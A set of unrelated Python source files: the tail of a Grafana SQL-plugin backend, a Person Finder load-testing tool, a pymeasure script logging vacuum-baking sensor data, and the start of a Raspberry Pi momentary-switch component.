print("========= END PRINT body of REQUEST ============")
query = body["options"]["variable"]
key = None
# check to see if it's safe to launch
# query = body["targets"][0]
id_name = "dummy_string"
name = query["datasource"]
key = gen_key(id_name, name)
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
if 0:
key_refId = gen_key_refId("dummy", "dummy", query["id"])
sql_stmt = query["query"]
sleep_time = 2 # seconds
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
    # NOTE: there can be multiple query variables defined, but they are sent here individually
# if "hide" in query and query["hide"] is True:
# continue
# res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
sql_stmt = query["query"]
data_type = "TableData"
res, error_obj = process_query_variable(query, key, sqlClient)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
    elif res is None:
# get_result <- False
assert 0
else:
resp_body.append(res)
# must be an array
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query_variable(
fullquery,
key,
sqlClient=None,
dt_from=None,
dt_to=None,
sdt_from=None,
sdt_to=None,
):
sql_stmt = fullquery["query"]
data_type = "TableData"
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# logger.debug('------------------')
# logger.debug(grafanaPluginInstances)
# # store the object connecting to SQL Client service
# logger.debug(grafanaPluginInstancesSqlClient)
# logger.debug('------------------')
# id = fullquery["id"]
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
                time_col, fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
if "aiops" == appname:
# process for AIOps data
substr += get_datetime_conditions_aiops(dt_from, dt_to) + " AND "
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
# substr += """ {time_col} >= to_date("{dt_from}") and {time_col} <= to_date("{dt_to}")""".format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
# substr += """ {time_col} BETWEEN "{dt_from}" and "{dt_to}" """.format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
# p_reg = p_cos_in
# patterns = p_reg.findall(sql_stmt)
# try:
# substr = grafanaPluginInstances.get_cos_source(key)
# except KeyError:
# # TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
# msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
# return None, HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# if len(patterns) > 0 and len(substr) == 0:
# msg = "Can't use $__source (default value has not been configured yet)"
# raise HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# for pattern in patterns:
# pattern = p_reg.search(sql_stmt)
# if pattern:
# # the $__source is used
# sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get test_data
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
# key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
key_refId = gen_key_refId("dummy", "dummy", prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
                    msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# print(sql_stmt)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
print("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId("dummy", "dummy", fullquery["id"])
                # Grafana sometimes sends the same request twice; this guards against
                # running the query twice on Cloud SQL. A new query may also arrive
                # shortly and override the current one - since a launched SQL query
                # cannot be cancelled, the request is queued and we wait a little
                # before actually launching it.
                # if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
                #     break
                # TODO - consider allowing users to request a 'rerun'
rerun = False
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = None
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if 0:
                    # FIXME: 'key' and 'key_refId' are not capable of distinguishing
                    # queries from two panels
                    # TODO - it's possible that the user decides to change from 'noresult'
                    # to 'get-result', so we should avoid a rerun if possible
                    # FIXME - the refId can be changed - so it's not a consistent way to track
job_id = grafanaPluginInstances.get_job_id(key, key_refId)
if job_id is None:
df, job_id = query_data(
key,
key_refId,
sql_stmt,
rerun=rerun,
sqlClient=sqlClient,
)
else:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(
key, thread_safe=True
)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
if job_status == "completed":
df = sqlClient.get_result(job_id)
                # only an error when results were actually requested
                if df is None and fullquery.get("get_result", True) is not False:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
                # a unique reference needs dashboardId + panelId + refId
                # TODO : when the webapp is shared by multiple Grafana instances,
                # the dashboardId and panelId may collide across instances
                # --> need to resolve this
assert job_id is not None
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
# job_id = sqlClient.submit_sql(sql_stmt, blocking=True)
# ok = False
# while not ok:
# gevent.sleep(20)
# ok = sqlClient.check_job_completion(job_id)
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
import traceback
traceback.print_exc()
msg = "Query {}: unknown error {}".format(fullquery["id"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(fullquery["id"])
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
    # convert NaN to an empty string so that the client can handle it
df.replace(np.nan, "", regex=True, inplace=True)
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
    # 'text' : field-name, 'type': a string representation of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
# mdict["columns"] = [
# {"text":"user_agent","type":"string"},
# {"text":"Time","type":"time"},
# {"text":"value","type":"number"}
# ]
# TableData
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
print(type(result))
print(result)
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
if __name__ == "__main__":
# run(app=app, host='localhost', port=18081,debug=True)
# run(app=app, host='localhost', port=18081, server='gevent')
if cmd_args.ssl is False:
run(app=app, host="0.0.0.0", port=18081, server="gevent")
else:
run(
app=app,
host="0.0.0.0",
port=18081,
server="gevent",
certfile="cert.pem",
keyfile="key.pem",
)
# run(app=app, host='0.0.0.0', port=18081, server='sslwebserver') # asynchronous I/O
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref', reloader=True) # single-threaded
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref') # single-threaded
|
load_test.py
|
#!/usr/bin/python2.7
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A command line tool to perform load test of Person Finder.
Usage:
- Write config.json like this:
{
"base_url": "http://my-person-finder.appspot.com",
"repo": "loadtest1",
"num_records": 100,
"num_queries": 100,
"create_record_qps": 10,
"search_record_qps": 10,
"num_threads": 100,
"output_dir": "/tmp/load_test_result",
"test_mode": false
}
- Run this command to perform load test to create person records:
$ ./tools/load_test config.json create
- Run this command to perform load test to search person records:
$ ./tools/load_test config.json search
- Each of the command above outputs something like this:
Average request latency (sec): 3.815
90%tile request latency (sec): 6.122
Average interval between requests (sec): 0.100
90%tile interval between requests (sec): 0.100
http_status:
200: 5 (100.0%)
"Request latency" shows how long it took to get HTTP responses to create
or search one record.
"Interval between requests" should roughly match the QPS specified in the
config file. If it is much longer than expected, you need to increase
num_threads.
- Don't forget to deactivate the repository in the PF admin page to free up
the datastore for the dummy records.
Config file reference:
base_url:
The base URL of Person Finder app.
repo:
The repository name used to perform load testing. The repository must
not exist before performing load test.
num_records:
The number of records created in "create" test.
num_queries:
The number of queries sent in "search" test.
create_record_qps:
It sends requests in this QPS in "create" test.
search_record_qps:
It sends requests in this QPS in "search" test.
num_threads:
The number of threads to perform the requests. It should be more than
the request latency * QPS.
output_dir:
The path to the directory to output a JSON file with detailed load test
result. You may want to look into this file for more detailed analysis.
test_mode:
If true, allows running "create" test for an existing repository.
"""
from __future__ import print_function
import datetime
import logging
import json
import os
import random
import scrape
import sys
import threading
import time
import traceback
import Queue
from google.appengine.ext import db
import config
import model
import remote_api
class Worker(object):
"""Workers (threads) in WorkerPool."""
def __init__(self):
self.task_queue = Queue.Queue()
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
while True:
task = self.task_queue.get(block=True)
if not task:
break
task()
def do_async(self, task):
self.task_queue.put(task)
def join(self):
self.task_queue.put(None)
self.thread.join()
class WorkerPool(object):
"""An implementation of a thread pool.
    WorkerPool.do_async blocks when all threads are busy. This is different
    from a typical thread pool implementation,
    e.g., multiprocessing.pool.ThreadPool, but the blocking behavior is
    desirable for load testing: it keeps the QPS roughly constant even after
    the threads are temporarily filled up.
"""
def __init__(self, size):
self.size = size
self.inactive_workers = Queue.Queue()
for _ in xrange(self.size):
self.inactive_workers.put(Worker())
def do_async(self, task, *args):
"""Calls task(*args) asynchronously."""
worker = self.inactive_workers.get(block=True)
def worker_task():
task(*args)
self.inactive_workers.put(worker)
worker.do_async(worker_task)
def join(self):
"""Waits until all tasks finish."""
for _ in xrange(self.size):
worker = self.inactive_workers.get(block=True)
worker.join()
class LoadTest(object):
"""Base class for a load testing job."""
def __init__(self, name, conf):
self.name = name
self.conf = conf
self.data = {
'request_latency_seconds': [],
'request_interval_seconds': [],
'http_statuses': [],
}
def execute_all(self):
"""Calls self.execute_one() for each input returned by
self.generate_input() in QPS specified by self.get_qps().
"""
pool = WorkerPool(self.conf['num_threads'])
for input in self.generate_input():
start_time = datetime.datetime.now()
pool.do_async(self.execute_one_internal, input)
time.sleep(1.0 / self.get_qps())
self.data['request_interval_seconds'].append(
(datetime.datetime.now() - start_time).total_seconds())
pool.join()
def execute_one_internal(self, input):
try:
start_time = datetime.datetime.now()
self.execute_one(input)
end_time = datetime.datetime.now()
self.data['request_latency_seconds'].append(
(end_time - start_time).total_seconds())
except Exception as e:
traceback.print_exc()
def save_result(self):
"""Saves load testing result to a JSON file.
It may be used for more detailed analysis later.
"""
file_name = '%s/%s_%s_result.json' % (
self.conf['output_dir'],
self.name,
datetime.datetime.now().strftime('%Y%m%d_%H%M%S'))
output = {
'conf': self.conf,
'data': self.data,
}
with open(file_name, 'w') as f:
json.dump(output, f)
def print_stats(self):
print()
print ('Average request latency (sec):\t%.3f'
% self.average(self.data['request_latency_seconds']))
print ('90%%tile request latency (sec):\t%.3f'
% self.ninety_percentile(self.data['request_latency_seconds']))
print ('Average interval between requests (sec):\t%.3f'
% self.average(self.data['request_interval_seconds']))
print ('90%%tile interval between requests (sec):\t%.3f'
% self.ninety_percentile(self.data['request_interval_seconds']))
print()
print('http_status:')
http_status_freqs = {}
for status in self.data['http_statuses']:
if status in http_status_freqs:
http_status_freqs[status] += 1
else:
http_status_freqs[status] = 1
for status, freq in http_status_freqs.iteritems():
status_str = str(status) if status else 'Error'
print(' %s: %d (%.1f%%)' % (
status_str, freq, 100.0 * freq / len(self.data['http_statuses'])))
def average(self, deltas):
if deltas:
return sum(deltas, 0.0) / len(deltas)
else:
return float('nan')
def ninety_percentile(self, deltas):
if deltas:
return sorted(deltas)[int(len(deltas) * 0.9)]
else:
return float('nan')
def load_names(self, file_name):
with open(file_name) as f:
return [line.rstrip('\n') for line in f]
class CreateRecordsLoadTest(LoadTest):
"""Load test for creating person records.
It creates records with first num_records entries (specified in conf)
in tests/load_test/names_in_db.txt.
"""
def __init__(self, conf):
super(CreateRecordsLoadTest, self).__init__('create_record', conf)
repo_exists = self.conf['repo'] in model.Repo.list()
if not self.conf['test_mode'] and repo_exists:
raise Exception(
'"create" task must be done against a new repository, but a '
'repository "%s" already exists. If you really want to do '
'this, set "test_mode" to true in the config JSON.'
% self.conf['repo'])
if not repo_exists:
self.create_repo(self.conf['repo'])
scraper = scrape.Session(verbose=1)
self.create_page = scraper.go(
'%s/%s/create?role=provide'
% (self.conf['base_url'], self.conf['repo']))
def get_qps(self):
return self.conf['create_record_qps']
def generate_input(self):
names = (self.load_names('tests/load_test/names_in_db.txt')
[:self.conf['num_records']])
for name in names:
yield name
def execute_one(self, name):
status = None
try:
logging.info('Create record: %s', name)
# Creates a new scrape.Session instance here because scrape.Session
# is not thread-safe. Note that this scraper.go() doesn't cause
# extra HTTP request.
scraper = scrape.Session(verbose=1)
scraper.go(self.create_page)
(given_name, family_name) = name.split(' ')
scraper.submit(
scraper.doc.cssselect_one('form'),
given_name=given_name,
family_name=family_name,
author_name='load_test.py',
text='This is a record created by load_test.py.')
status = scraper.status
finally:
self.data['http_statuses'].append(status)
def create_repo(self, repo):
logging.info('Create repo: %s', repo)
db.put([model.Repo(key_name=repo)])
# Provides some defaults.
config.set_for_repo(
repo,
language_menu_options=['en'],
repo_titles={'en': repo},
keywords='',
use_family_name=True,
use_alternate_names=True,
use_postal_code=True,
allow_believed_dead_via_ui=False,
min_query_word_length=1,
show_profile_entry=False,
profile_websites=[],
map_default_zoom=6,
map_default_center=[0, 0],
map_size_pixels=[400, 280],
read_auth_key_required=True,
search_auth_key_required=True,
deactivated=False,
launched=False,
deactivation_message_html='',
start_page_custom_htmls={},
results_page_custom_htmls={},
view_page_custom_htmls={},
seek_query_form_custom_htmls={},
footer_custom_htmls={},
bad_words='',
published_date=0.0,
updated_date=0.0,
test_mode=False,
force_https=False,
zero_rating_mode=False,
)
class SearchRecordsLoadTest(LoadTest):
"""Load test for searching records.
It searches for given names, family names or full names in equal
probability. The names are taken randomly from:
- the first num_records entries in tests/load_test/names_in_db.txt
- the first num_records entries in tests/load_test/names_not_in_db.txt
"""
def __init__(self, conf):
super(SearchRecordsLoadTest, self).__init__('search_record', conf)
assert self.conf['repo'] in model.Repo.list(), (
'Repository "%s" doesn\'t exist.' % self.conf['repo'])
scraper = scrape.Session(verbose=1)
self.search_page = scraper.go(
'%s/%s/query?role=seek'
% (self.conf['base_url'], self.conf['repo']))
def get_qps(self):
return self.conf['search_record_qps']
def generate_input(self):
r = random.Random()
r.seed(0) # For reproducible result.
full_names = (
self.load_names('tests/load_test/names_in_db.txt')
[:self.conf['num_records']] +
self.load_names('tests/load_test/names_not_in_db.txt')
[:self.conf['num_records']])
given_names = []
family_names = []
for full_name in full_names:
(given_name, family_name) = full_name.split(' ')
given_names.append(given_name)
family_names.append(family_name)
names = full_names + given_names + family_names
for _ in xrange(self.conf['num_queries']):
yield r.choice(names)
def execute_one(self, query):
status = None
try:
logging.info('Search record: %s', query)
scraper = scrape.Session(verbose=1)
scraper.go(self.search_page)
scraper.submit(
scraper.doc.cssselect_one('form'),
query=query)
status = scraper.status
finally:
self.data['http_statuses'].append(status)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
    if len(sys.argv) != 3 or sys.argv[2] not in ('create', 'search'):
        sys.stderr.write(
            'Usage:\n'
            'tools/load_test config.json create\n'
            'tools/load_test config.json search\n')
        sys.exit(1)
with open(sys.argv[1]) as f:
conf = json.load(f)
if not os.path.exists(conf['output_dir']):
os.makedirs(conf['output_dir'])
remote_api.connect(conf['base_url'])
if len(sys.argv) == 3 and sys.argv[2] == 'create':
load_test = CreateRecordsLoadTest(conf)
elif sys.argv[2] == 'search':
load_test = SearchRecordsLoadTest(conf)
else:
raise Exception('Should not happen')
load_test.execute_all()
load_test.save_result()
load_test.print_stats()
|
baking_scd30.py
|
import logging
import sys, os
import numpy as np
import requests.exceptions
sys.path.append('../')
sys.modules['cloudpickle'] = None
import threading
import time
from instruments.scd30 import SCD30
from pymeasure.display.Qt import QtGui
from pymeasure.display.windows import ManagedWindow
from pymeasure.experiment import Procedure, Results
from pymeasure.experiment import IntegerParameter, FloatParameter
from pymeasure.experiment import unique_filename
from instruments.mx200 import MX200
import sched
import datetime
from instruments.inhibitor import WindowsInhibitor
class BakingProcedure(Procedure):
experiment_time = FloatParameter('Experiment Time', units='h', default=1)
interval = FloatParameter('Sampling Interval', units='s', default=1)
__scd: SCD30 = None
__mx200: MX200 = None
__scheduler: sched.scheduler = None
__time_start: datetime.datetime = None
__ndata_points: int = 0
__thread: threading.Thread = None
__on_sleep: WindowsInhibitor = None
__mx200_delay: float = 0.001
port = 'COM3'
__keep_alive: bool = False
__failed_readings = 0
__max_attempts = 10
__previous_reading: dict = None
__previous_pressure: float = None
DATA_COLUMNS = ["Time (h)", "Temperature (C)", r"Relative Humidity (percent)", "CO2 (ppm)",
"Pressure CH1 (Torr)"]
def startup(self):
log.info("Creating BME680.")
self.__scd = SCD30(uri='http://128.54.52.108', username='qwerty', password='12345')
log.info("Setting up Televac MX200")
self.__mx200 = MX200(address=self.port)
self.__mx200_delay = self.__mx200.delay
self.__mx200.units = 'mTorr'
def execute(self):
self.__ndata_points = int(self.experiment_time * 3600 / self.interval)
self.__scheduler = sched.scheduler(timefunc=time.time, delayfunc=time.sleep)
self.__time_start = datetime.datetime.now()
self.__mx200.units = 'mTorr'
# Reset the counter for failed readings
self.__failed_readings = 0
log.info("Starting the loop of {0:d} datapoints.".format(self.__ndata_points))
log.info("Date time at start of measurement: {dt}.".format(dt=self.__time_start))
delay = 0
events = []
n = 1
while delay <= self.experiment_time * 3600:
# event_id = self.__scheduler.enter(delay=delay, priority=1, action=self.get_bme_data, argument=(n,))
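            # enterabs() schedules each sample at an absolute time relative to
            # __time_start, so the sampling grid does not drift when an individual
            # acquisition runs long (unlike the relative-delay enter() call above).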
bme_event_id = self.__scheduler.enterabs(
time=self.__time_start.timestamp() + delay, priority=1,
action=self.acquire_data, argument=(n,)
)
delay += self.interval
events.append(bme_event_id)
n += 1
self.__thread = threading.Thread(target=self.__scheduler.run)
self.inhibit_sleep()
self.__thread.start()
self.__thread.join()
def shutdown(self):
self.kill_queue()
self.unhinibit_sleep()
def kill_queue(self):
self.unhinibit_sleep()
if self.__scheduler is not None:
for e in self.__scheduler.queue:
try:
self.__scheduler.cancel(e)
except ValueError:
pass
def __del__(self):
self.kill_queue()
def acquire_data(self, n):
if self.should_stop():
log.warning("Caught the stop flag in the procedure")
self.kill_queue()
pressure = self.__mx200.pressure(1)
# If the pressure gives a bad reading (e.g. OVERLOAD) try again
if type(pressure) == str:
if self.__failed_readings < self.__max_attempts:
self.__failed_readings += 1
log.warning("Could not read pressure at time: {0}. Message: {1}".format(
datetime.datetime.now().isoformat(), pressure
))
time.sleep(0.1)
                return self.acquire_data(n)
else:
log.warning('Error reading pressure. Read out: {0}'.format(pressure))
pressure = self.__previous_pressure if self.__previous_pressure is not None else np.NaN
dt = (datetime.datetime.now() - self.__time_start).total_seconds()
data = {
"Time (h)": dt / 3600.,
"Pressure CH1 (Torr)": pressure
}
self.__previous_pressure = pressure
try:
scd_data = self.__scd.read_env()
except requests.exceptions.ConnectionError as e:
log.warning('Could not access SCD30.')
log.warning(e)
if self.__failed_readings < self.__max_attempts:
self.__failed_readings += 1
log.warning('Attempting to read from SCD30. Attempt number: {0}.'.format(self.__failed_readings))
scd_data = self.__scd.read_env()
else:
if self.__previous_reading is not None:
scd_data = [
{"type": "temperature", "value": self.__previous_reading['Temperature (C)'], "unit": "°C"},
{"type": "humidity", "value": self.__previous_reading['Relative Humidity (percent)'],
"unit": "%"},
{"type": "CO2", "value": self.__previous_reading['CO2 (ppm)'], "unit": "ppm"}
]
self.__failed_readings = 0
else:
# raise requests.exceptions.ConnectionError('Maximum number of reconnects for BME680')
scd_data = [
{"type": "temperature", "value": np.NaN, "unit": "°C"},
{"type": "humidity", "value": np.NaN, "unit": "%"},
{"type": "CO2", "value": np.NaN, "unit": "ppm"}
]
self.__failed_readings = 0
for row in scd_data:
if row['type'] == 'temperature':
data['Temperature (C)'] = row['value']
elif row['type'] == 'humidity':
data['Relative Humidity (percent)'] = row['value']
elif row['type'] == 'CO2':
data['CO2 (ppm)'] = row['value']
self.__failed_readings = 0
self.__previous_reading = data
self.emit('results', data)
self.emit('progress', n * 100. / self.__ndata_points)
log.debug("Emitting results: {0}".format(data))
def inhibit_sleep(self):
if os.name == 'nt' and not self.__keep_alive:
self.__on_sleep = WindowsInhibitor()
self.__on_sleep.inhibit()
self.__keep_alive = True
def unhinibit_sleep(self):
if os.name == 'nt' and self.__keep_alive:
self.__on_sleep.unhinibit()
self.__keep_alive = False
class MainWindow(ManagedWindow):
def __init__(self):
super(MainWindow, self).__init__(
procedure_class=BakingProcedure,
inputs=['experiment_time', 'interval'],
displays=['experiment_time', 'interval'],
x_axis="Time (h)",
y_axis="Pressure CH1 (Torr)",
directory_input=True,
)
        self.setWindowTitle('Baking data')
def queue(self):
directory = self.directory
filename = unique_filename(directory, prefix='BAKING_')
        log_file = os.path.splitext(filename)[0] + '.log'
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh = logging.FileHandler(log_file)
fh.setFormatter(formatter)
fh.setLevel(logging.DEBUG)
log.addHandler(fh)
procedure = self.make_procedure()
results = Results(procedure, filename)
experiment = self.new_experiment(results)
self.manager.queue(experiment)
if __name__ == "__main__":
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
momentary_switch_component.py
|
"""This module contains the MomentarySwitchComponent type."""
import threading
from raspy.argument_null_exception import ArgumentNullException
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.components.switches import switch_state
from raspy.components.switches.momentary_switch import MomentarySwitch
from raspy.components.switches.switch_state_change_event import SwitchStateChangeEvent
from raspy.io import pin_mode
from raspy.io import pin_state
from raspy.io import gpio
from raspy.pi_system import core_utils
OFF_STATE = pin_state.LOW
"""The pin state to consider the switch off."""
ON_STATE = pin_state.HIGH
"""The pin state to consider the switch on."""
class MomentarySwitchComponent(MomentarySwitch):
"""A component that is an abstraction of a momentary switch."""
def __init__(self, pin):
"""Initialize a new instance of MomentarySwitchComponent.
:param gpio.Gpio pin: The input pin the switch is attached to.
:raises: ArgumentNullException if pin is None.
"""
MomentarySwitch.__init__(self)
if pin is None:
raise ArgumentNullException("'pin' param cannot be None.")
self.__isPolling = False
self.__pollThread = None
self.__stopEvent = threading.Event()
self.__stopEvent.set()
self.__pin = pin
self.__pin.provision()
